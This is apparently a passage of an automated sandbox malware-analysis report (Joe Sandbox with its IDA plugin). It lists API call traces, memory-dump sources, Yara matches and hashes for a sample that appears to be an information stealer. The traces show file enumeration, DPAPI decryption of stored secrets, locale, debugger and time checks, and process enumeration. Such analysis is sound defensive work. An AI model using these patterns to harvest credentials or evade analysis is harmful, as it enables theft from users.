                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022DDD52
                                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 022DDD9A
                                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 022DDDB0
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE033
                                          • FindClose.KERNEL32(000000FF), ref: 022DE045
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                          • Instruction ID: 9941f445295ef5382ed7860858ae350d260117f63b03bba7a040d7134d76ec0a
                                          • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                          • Instruction Fuzzy Hash: 4F9171729203049BCF14FBF4DD959FD737AAB95300F404658E80B96298EF389B189F91
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                          • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                          • Instruction ID: f9fcf0aa570474f21502db070e27222cd3742d892e756a41d4cafcb42446bad5
                                          • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                          • Instruction Fuzzy Hash: 69B13F719203189BCF24EFA4DD95EEE737AAF94300F808199E40B56698EF345B48DF91
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID: \*.*$@
                                          • API String ID: 433455689-2355794846
                                          • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                          • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                          • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                          • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022D1B8A
                                          • StrCmpCA.SHLWAPI(?,0042526C), ref: 022D1BDA
                                          • StrCmpCA.SHLWAPI(?,00425314), ref: 022D1BF0
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022D1FA7
                                          • DeleteFileA.KERNEL32(00000000), ref: 022D2031
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022D2087
                                          • FindClose.KERNEL32(000000FF), ref: 022D2099
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 1415058207-0
                                          • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                          • Instruction ID: 73a9364c24afd51a29fb2c5b36399241a525cd4f94928fcb7a40d0c7100667f9
                                          • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                          • Instruction Fuzzy Hash: 0512B971920318ABCF19EBA4DD95EFD737AAF64300F80419DA50B62198EF746B88DF50
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022DE0C5
                                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 022DE115
                                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 022DE12B
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE647
                                          • FindClose.KERNEL32(000000FF), ref: 022DE659
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2325840235-0
                                          • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                          • Instruction ID: 440464842bfea9bd3f8c3077bc53d2126ae183129c8bf3bfc03003d384b37090
                                          • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                          • Instruction Fuzzy Hash: D5F18E719243189ACF19EBA4DD95EEE733ABF64300F8051DEA04B62194EF346F89DE50
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                          • LocalFree.KERNEL32(00000000), ref: 00417D22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID: /
                                          • API String ID: 3090951853-4001269591
                                          • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                          • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                          • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                          • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                          APIs
                                          • memset.MSVCRT ref: 0040C853
                                          • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00978448), ref: 0040C871
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                          • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                          • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                          • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                          • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                          • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                          • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                          • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                          APIs
                                          • memset.MSVCRT ref: 022DCABA
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                          • memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                          • lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                          • lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                          • lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                          • Instruction ID: 7124607a6af9e312d62fabed20a90f864ab73880f9c43b6cd4e3b9e6036be3fd
                                          • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                          • Instruction Fuzzy Hash: 9441807895421AEFDB10DFE0DC88BFEBBB9BB44304F1045A9E509A6284D7749B84CF91
                                          APIs
                                          • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00946070,?,0042110C,?,00000000,?), ref: 0041696C
                                          • sscanf.NTDLL ref: 00416999
                                          • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00946070,?,0042110C), ref: 004169B2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00946070,?,0042110C), ref: 004169C0
                                          • ExitProcess.KERNEL32 ref: 004169DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID: B
                                          • API String ID: 2533653975-2248957098
                                          • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                          • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                          • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                          • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                          • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID: N@
                                          • API String ID: 4291131564-4229412743
                                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022E7E48
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022E7E60
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 022E7E74
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022E7EC9
                                          • LocalFree.KERNEL32(00000000), ref: 022E7F89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID:
                                          • API String ID: 3090951853-0
                                          • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                          • Instruction ID: 7b36b7044187fc5517709c669f925f6071b0808c46861aa294c5174f1270752c
                                          • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                          • Instruction Fuzzy Hash: 2F414B71960218ABDF24DF94DC89BEDB3B5FB54700F5041D9E00AA6294DB742F85CFA1
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                          • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                          • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                          • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 022EBE09
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022EBE1E
                                          • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022EBE29
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 022EBE45
                                          • TerminateProcess.KERNEL32(00000000), ref: 022EBE4C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction ID: 448d301f87af9d0852dfd6569630a4753f537efff7dbbb595473ce5d966f2ee6
                                          • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction Fuzzy Hash: 8F21A0BC910305DFDB14DF69F8896963BE4FB0A314F50403AE90A872A4EBB05985EF49
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 3657800372-0
                                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022D74B4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D74BB
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022D74E8
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022D750B
                                          • LocalFree.KERNEL32(?), ref: 022D7515
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 2609814428-0
                                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction ID: 03cadf98fc03014be5a8b63e80c28f79453de4ce1e4a8b84e0aa660d07293381
                                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction Fuzzy Hash: FF010075A90208BBEB10DFD4DD45F9D77B9EB44704F108155FB05AA2C4D6B4AA00CB66
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                          • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                          • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022E9885
                                          • Process32First.KERNEL32(00420ACA,00000128), ref: 022E9899
                                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 022E98AE
                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 022E98C3
                                          • CloseHandle.KERNEL32(00420ACA), ref: 022E98E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
